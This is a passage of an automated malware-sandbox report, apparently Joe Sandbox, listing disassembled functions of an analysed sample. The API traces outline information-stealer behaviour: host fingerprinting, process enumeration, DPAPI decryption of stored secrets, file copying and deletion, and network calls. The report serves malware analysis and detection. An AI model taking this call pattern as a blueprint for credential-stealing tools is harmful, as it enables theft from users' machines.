Part of subcall function 658A35A0: QueryPerformanceFrequency.KERNEL32(?), ref: 658A35FD
Part of subcall function 658A35A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 658A363F
Part of subcall function 658A35A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 658A369F
Part of subcall function 658A35A0: __aulldiv.LIBCMT ref: 658A36E4

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 658A309F

Part of subcall function 658C5B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,658C56EE,?,00000001), ref: 658C5B85
Part of subcall function 658C5B50: EnterCriticalSection.KERNEL32(6592F688,?,?,?,658C56EE,?,00000001), ref: 658C5B90
Part of subcall function 658C5B50: LeaveCriticalSection.KERNEL32(6592F688,?,?,?,658C56EE,?,00000001), ref: 658C5BD8
Part of subcall function 658C5B50: GetTickCount64.KERNEL32 ref: 658C5BE4

?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 658A30BE

Part of subcall function 658A30F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 658A3127
Part of subcall function 658A30F0: __aulldiv.LIBCMT ref: 658A3140

Part of subcall function 658DAB2A: __onexit.LIBCMT ref: 658DAB30

Strings

O'/, xrefs: 658A306A

Memory Dump Source

Source File: 0000000C.00000002.2644690067.00000000658A1000.00000020.00000001.01000000.00000027.sdmp, Offset: 658A0000, based on PE: true

Associated: 0000000C.00000002.2643997678.00000000658A0000.00000002.00000001.01000000.00000027.sdmpDownload File
Associated: 0000000C.00000002.2646142538.000000006591D000.00000002.00000001.01000000.00000027.sdmpDownload File
Associated: 0000000C.00000002.2646561764.000000006592E000.00000004.00000001.01000000.00000027.sdmpDownload File
Associated: 0000000C.00000002.2647031877.0000000065932000.00000002.00000001.01000000.00000027.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_658a0000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Similarity

API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
String ID: O'/
API String ID: 4291168024-3288639832
Opcode ID: 243eeb32ca8a15a82eb3706c60888f987df62b970a2ee5d6ca19fb117d55698f
Instruction ID: 85b1589a9e475081f09450e089af8308e4d90892c7245dc673279f3a82684e21
Opcode Fuzzy Hash: 243eeb32ca8a15a82eb3706c60888f987df62b970a2ee5d6ca19fb117d55698f
Instruction Fuzzy Hash: 26F02D22D3874C97CB10DF7888426A6B3A0EF6B11CF509B19E84453451FF2069D88383

Uniqueness

Uniqueness Score: -1.00%

Function 0040CEC0 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00415260: GetSystemTime.KERNEL32(?,00CE7350,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040CF41
lstrlen.KERNEL32(00000000), ref: 0040D0DF
lstrlen.KERNEL32(00000000), ref: 0040D0F3
DeleteFileA.KERNEL32(00000000), ref: 0040D16C

Memory Dump Source

Source File: 0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2507015806.0000000000448000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: b077159fb6ffb0efbc573af67000bcd4c7b02bd76486684dd7424d10ac42a3ed
Instruction ID: 64a31cdf4344fffa4b83296b1621afa9cae3fe45de11617b70f8002e61f1a089
Opcode Fuzzy Hash: b077159fb6ffb0efbc573af67000bcd4c7b02bd76486684dd7424d10ac42a3ed
Instruction Fuzzy Hash: 758147769102049BCB14FBA1DC52EEE7739BF54308F51411EF516B6091EF38AA89CBB8

Uniqueness

Uniqueness Score: -1.00%

Function 0040FD10 Relevance: 6.1, APIs: 2, Strings: 1, Instructions: 857stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 004141C0: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004141DF
Part of subcall function 004141C0: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041421C
Part of subcall function 004141C0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004142A0
Part of subcall function 004141C0: HeapAlloc.KERNEL32(00000000), ref: 004142A7

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00414300: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414314
Part of subcall function 00414300: HeapAlloc.KERNEL32(00000000), ref: 0041431B
Part of subcall function 00414300: RegOpenKeyExA.KERNEL32(80000002,00CC95F8,00000000,00020119,00000000), ref: 0041433B
Part of subcall function 00414300: RegQueryValueExA.KERNEL32(00000000,00CE6528,00000000,00000000,000000FF,000000FF), ref: 0041435C
Part of subcall function 00414300: RegCloseKey.ADVAPI32(00000000), ref: 00414366

Part of subcall function 00414380: GetCurrentProcess.KERNEL32(00000000,?,?,0040FF99,00000000,?,00CE6CA8,00000000,?,0041D74C,00000000,?,00000000,00000000,?,00CE2ED8), ref: 0041438F
Part of subcall function 00414380: IsWow64Process.KERNEL32(00000000,?,?,0040FF99,00000000,?,00CE6CA8,00000000,?,0041D74C,00000000,?,00000000,00000000,?,00CE2ED8), ref: 00414396

Part of subcall function 004143C0: GetProcessHeap.KERNEL32(00000000,00000104,00401177,00CE2D58,004136EB,0041D6E3), ref: 004143CD
Part of subcall function 004143C0: HeapAlloc.KERNEL32(00000000), ref: 004143D4
Part of subcall function 004143C0: GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC

Part of subcall function 00414400: GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
Part of subcall function 00414400: HeapAlloc.KERNEL32(00000000), ref: 00414414
Part of subcall function 00414400: GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C

Part of subcall function 00414450: GetProcessHeap.KERNEL32(00000000,00000104,?,0041D748,00000000,?,00000000,0041D2B1), ref: 0041445D
Part of subcall function 00414450: HeapAlloc.KERNEL32(00000000), ref: 00414464
Part of subcall function 00414450: GetLocalTime.KERNEL32(?), ref: 00414471
Part of subcall function 00414450: wsprintfA.USER32 ref: 004144A0

Part of subcall function 004144B0: GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,00CE6480,00000000,?,0041D758,00000000,?,00000000,00000000,?,00CE6CE8,00000000), ref: 004144C0
Part of subcall function 004144B0: HeapAlloc.KERNEL32(00000000), ref: 004144C7
Part of subcall function 004144B0: GetTimeZoneInformation.KERNEL32(?), ref: 004144DA

Part of subcall function 00414530: GetUserDefaultLocaleName.KERNEL32(00000000,00000055,00000000,00000000,?,00CE6480,00000000,?,0041D758,00000000,?,00000000,00000000,?,00CE6CE8,00000000), ref: 00414542

Part of subcall function 00414570: GetKeyboardLayoutList.USER32(00000000,00000000,0041D146), ref: 0041459E
Part of subcall function 00414570: LocalAlloc.KERNEL32(00000040,?), ref: 004145B6
Part of subcall function 00414570: GetKeyboardLayoutList.USER32(?,00000000), ref: 004145CA
Part of subcall function 00414570: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 0041461F
Part of subcall function 00414570: LocalFree.KERNEL32(00000000), ref: 004146DF

Part of subcall function 00414710: GetSystemPowerStatus.KERNEL32(00000000), ref: 0041471A

GetCurrentProcessId.KERNEL32(00000000,?,00CE6D08,00000000,?,0041D76C,00000000,?,00000000,00000000,?,00CE5F88,00000000,?,0041D768,00000000), ref: 0041037E

Part of subcall function 00415B70: OpenProcess.KERNEL32(00000410,00000000,?), ref: 00415B84
Part of subcall function 00415B70: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00415BA5
Part of subcall function 00415B70: CloseHandle.KERNEL32(00000000), ref: 00415BAF

Part of subcall function 00414740: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414754
Part of subcall function 00414740: HeapAlloc.KERNEL32(00000000), ref: 0041475B
Part of subcall function 00414740: RegOpenKeyExA.KERNEL32(80000002,00CC9278,00000000,00020119,00000000), ref: 0041477B
Part of subcall function 00414740: RegQueryValueExA.KERNEL32(00000000,00CE6C08,00000000,00000000,000000FF,000000FF), ref: 0041479C
Part of subcall function 00414740: RegCloseKey.ADVAPI32(00000000), ref: 004147A6

Part of subcall function 00414800: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00414846
Part of subcall function 00414800: GetLastError.KERNEL32 ref: 00414855

Part of subcall function 004147C0: GetSystemInfo.KERNEL32(00000000), ref: 004147CD
Part of subcall function 004147C0: wsprintfA.USER32 ref: 004147E3

Part of subcall function 00414960: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,00CE6060,00000000,?,0041D774,00000000,?,00000000,00000000,?,00CE6108), ref: 0041496D
Part of subcall function 00414960: HeapAlloc.KERNEL32(00000000), ref: 00414974
Part of subcall function 00414960: GlobalMemoryStatusEx.KERNEL32(00000040), ref: 00414995
Part of subcall function 00414960: __aulldiv.LIBCMT ref: 004149AF
Part of subcall function 00414960: __aulldiv.LIBCMT ref: 004149BD
Part of subcall function 00414960: wsprintfA.USER32 ref: 004149E9

Part of subcall function 00414ED0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00414F1C
Part of subcall function 00414ED0: HeapAlloc.KERNEL32(00000000), ref: 00414F23
Part of subcall function 00414ED0: wsprintfA.USER32 ref: 00414F3D

Part of subcall function 00414AE0: RegOpenKeyExA.KERNEL32(00000000,00CE3488,00000000,00020019,00000000,0041D289), ref: 00414B41

Part of subcall function 00414AE0: RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00414BC3
Part of subcall function 00414AE0: wsprintfA.USER32 ref: 00414BF6
Part of subcall function 00414AE0: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00414C18
Part of subcall function 00414AE0: RegCloseKey.ADVAPI32(00000000), ref: 00414C29
Part of subcall function 00414AE0: RegCloseKey.ADVAPI32(00000000), ref: 00414C36

Part of subcall function 00414DE0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00414E07
Part of subcall function 00414DE0: Process32First.KERNEL32(00000000,00000128), ref: 00414E1B
Part of subcall function 00414DE0: Process32Next.KERNEL32(00000000,00000128), ref: 00414E30
Part of subcall function 00414DE0: FindCloseChangeNotification.KERNEL32(00000000), ref: 00414E9E

lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0041095B

Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,00CE3038), ref: 00404ED9

Strings

E.A, xrefs: 00410981, 004109AC, 00410984

Memory Dump Source

Source File: 0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2507015806.0000000000448000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Yara matches

Similarity

API ID: Heap$Process$Alloc$CloseOpen$wsprintf$Namelstrcpy$InformationLocallstrlen$CurrentInfoKeyboardLayoutListLocaleProcess32QueryStatusSystemTimeUserValue__aulldivlstrcat$ChangeComputerCreateDefaultDirectoryEnumErrorFileFindFirstFreeGlobalHandleInternetLastLogicalMemoryModuleNextNotificationPowerProcessorSnapshotToolhelp32VolumeWindowsWow64Zone
String ID: E.A
API String ID: 1035121393-2211245587
Opcode ID: c85251b4ff410f80925b045f44cdc44d53612f2cfb5396b4feba7f9a2efabb72
Instruction ID: c29c4d19e1a1d8256a8b8cfc17993bd3f91cdea4a247a897ffed86f061f16859
Opcode Fuzzy Hash: c85251b4ff410f80925b045f44cdc44d53612f2cfb5396b4feba7f9a2efabb72
Instruction Fuzzy Hash: 9372B076D10118AACB15FB91EC91EDEB73DAF14308F51439FB01662491EF346B89CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00411350 Relevance: 6.1, APIs: 4, Instructions: 100stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 00411378

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

strtok_s.MSVCRT ref: 0041146F

Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,00CC5FA0,?,0041D8AC,?,00000000), ref: 00416E2B
Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85

Memory Dump Source

Source File: 0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2507015806.0000000000448000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Yara matches

Similarity

API ID: lstrcpystrtok_s$lstrlen
String ID:
API String ID: 3184129880-0
Opcode ID: b32dbd48fef6c991f24393565f536ea1b201fd5407d7c8f9d1c6b670b0949385
Instruction ID: bc44fb65e395c18893d79e2daadfc8d7f4384440e0cba23ba4018ddaa6f79c9f
Opcode Fuzzy Hash: b32dbd48fef6c991f24393565f536ea1b201fd5407d7c8f9d1c6b670b0949385
Instruction Fuzzy Hash: 04417175D00208DBCB04EFE5D855AEEBB75BF48304F00811EE51177290EB38AA85CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 004096C0 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
Part of subcall function 004093A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
Part of subcall function 004093A0: LocalAlloc.KERNEL32(00000040,?), ref: 00409411
Part of subcall function 004093A0: ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
Part of subcall function 004093A0: LocalFree.KERNEL32('@), ref: 00409470
Part of subcall function 004093A0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 0040947A

Part of subcall function 00415530: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00415552

StrStrA.SHLWAPI(00000000,00CE6240), ref: 0040971B

Part of subcall function 004094A0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 004094CF
Part of subcall function 004094A0: LocalAlloc.KERNEL32(00000040,?,?,?,00404BAE,00000000,?), ref: 004094E1
Part of subcall function 004094A0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 0040950A
Part of subcall function 004094A0: LocalFree.KERNEL32(?,?,?,?,00404BAE,00000000,?), ref: 0040951F

memcmp.MSVCRT ref: 00409774

Part of subcall function 00409540: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409564
Part of subcall function 00409540: LocalAlloc.KERNEL32(00000040,00000000), ref: 00409583
Part of subcall function 00409540: LocalFree.KERNEL32(?), ref: 004095AF

Strings

DPAPI, xrefs: 0040976B
, xrefs: 004097A3

Memory Dump Source

Source File: 0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2507015806.0000000000448000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Yara matches

Similarity

API ID: Local$Alloc$CryptFileFree$BinaryString$ChangeCloseCreateDataFindNotificationReadSizeUnprotectlstrcpymemcmp
String ID: $DPAPI
API String ID: 2647593125-1819349886
Opcode ID: 0f5c4bf38f16a5dc7c6c7dc1d4b3af3428d24ec323dc2f9b096cad114df4e3c7
Instruction ID: 25d6f3248392bfa9bca68fd769027b68fff5740b7e0b7820d89104a1b18a6e16
Opcode Fuzzy Hash: 0f5c4bf38f16a5dc7c6c7dc1d4b3af3428d24ec323dc2f9b096cad114df4e3c7
Instruction Fuzzy Hash: 493141B6D10108EBCF04DF94DC45AEFB7B9AF48704F14452DE905B3292E7389A44CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00414DE0 Relevance: 6.1, APIs: 4, Instructions: 60processCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00414E07
Process32First.KERNEL32(00000000,00000128), ref: 00414E1B
Process32Next.KERNEL32(00000000,00000128), ref: 00414E30

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

FindCloseChangeNotification.KERNEL32(00000000), ref: 00414E9E

Memory Dump Source

Source File: 0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2507015806.0000000000448000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Yara matches

Similarity

API ID: lstrcpy$Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32lstrcatlstrlen
String ID:
API String ID: 3491751439-0
Opcode ID: 804360d7c2f176336161db38f5e3d517a66093eb693da5540614de3abea91edb
Instruction ID: b51d58226d22fc07b4aaea4bdcaba1b12d12dab42e387443cd86e66b2ce9f1c4
Opcode Fuzzy Hash: 804360d7c2f176336161db38f5e3d517a66093eb693da5540614de3abea91edb
Instruction Fuzzy Hash: ED211D759002189BCB24EB61DC95FDEB779AF54304F1041DAA50A66190DF38AFC5CF94

Uniqueness

Uniqueness Score: -1.00%

Function 004159E0 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00411879,80000000,00000003,00000000,00000003,00000080,00000000,?,00411879,?), ref: 004159FC
GetFileSizeEx.KERNEL32(000000FF,00411879), ref: 00415A19
CloseHandle.KERNEL32(000000FF), ref: 00415A27

Memory Dump Source

Source File: 0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2507015806.0000000000448000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleSize
String ID:
API String ID: 1378416451-0
Opcode ID: f3a5877fc348a9a64368c001e27037213673241a1fda354ede690d4ee948c5a4
Instruction ID: adbcd47bb22ca6d6b42933acd4cabc8e10c5a14c322029dfd4b487fe3fd33794
Opcode Fuzzy Hash: f3a5877fc348a9a64368c001e27037213673241a1fda354ede690d4ee948c5a4
Instruction Fuzzy Hash: C9F03139F44604FBDB20DBF0DC85BDE7779BF44710F118255B951A7280DA7496428B44

Uniqueness

Uniqueness Score: -1.00%

Function 004137B3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00CC5FA0,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 0041378A
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004137A8
CloseHandle.KERNEL32(00000000), ref: 004137B9
Sleep.KERNEL32(00001770), ref: 004137C4
CloseHandle.KERNEL32(?,00000000,?,00CC5FA0,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 004137DA
ExitProcess.KERNEL32 ref: 004137E2

Memory Dump Source

Source File: 0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2507015806.0000000000448000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$CreateExitOpenProcessSleep
String ID:
API String ID: 941982115-0
Opcode ID: b72d18ed1bdfc85c434ab68d1be83dc3fedaf905ff30e20f0e2c3bf58e55dee1
Instruction ID: 00ad45554361a1bf9ffb836df5d455c5d00fe00f471bf70531fad30136aebd8c
Opcode Fuzzy Hash: b72d18ed1bdfc85c434ab68d1be83dc3fedaf905ff30e20f0e2c3bf58e55dee1
Instruction Fuzzy Hash: 5FF054B0944206AAE720AFA1DD05BFE7675BB08B46F10851AF612951C0DBB856818A5D

Uniqueness

Uniqueness Score: -1.00%

Function 00406730 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 157COMMON

Download Yara Rule

Strings

Pi@, xrefs: 004067C2, 0040684E, 0040679E, 0040689F, 00406884

Memory Dump Source

Source File: 0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2507015806.0000000000448000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Yara matches

Similarity

API ID:
String ID: Pi@
API String ID: 0-1360946908
Opcode ID: 8cfa37973c56b3597612bf0eabde1d0c10c792fef38bbd1cab651f123bbbde38
Instruction ID: 3e1b1374d11ee30af11b8018be346ecc1401931fa3badc01db0dac5c56ce0c6a
Opcode Fuzzy Hash: 8cfa37973c56b3597612bf0eabde1d0c10c792fef38bbd1cab651f123bbbde38
Instruction Fuzzy Hash: 756105B5D00208DBDB14DF94D984BEEB7B0AB48304F1185AAE80677380D739AEA5DF95

Uniqueness

Uniqueness Score: -1.00%

Function 00404470 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60stringnetworkCOMMON

Download Yara Rule

APIs

Part of subcall function 00414FF0: malloc.MSVCRT ref: 00414FF8

lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506

Strings

<, xrefs: 00404489

Memory Dump Source

Source File: 0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2507015806.0000000000448000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Yara matches

Similarity

API ID: CrackInternetlstrlenmalloc
String ID: <
API String ID: 3848002758-4251816714
Opcode ID: 687962ccc4eae67d17fcff549de06531ab168f4bf6ac0391c2f29faedae00af7
Instruction ID: 4ed07355fbd84ea2b0e25782c0c6f45789bb77a73037a8222357df496ca5bcbd
Opcode Fuzzy Hash: 687962ccc4eae67d17fcff549de06531ab168f4bf6ac0391c2f29faedae00af7
Instruction Fuzzy Hash: 52216DB1D00208ABDF10EFA5E845BDD7B74AB44324F008229FA25B72C0EB346A46CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0040EF80 Relevance: 4.7, APIs: 3, Instructions: 197COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,00CE2DA8), ref: 0040EFCE
StrCmpCA.SHLWAPI(00000000,00CE2E18), ref: 0040F06F
StrCmpCA.SHLWAPI(00000000,00CE2E48), ref: 0040F17E

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Memory Dump Source

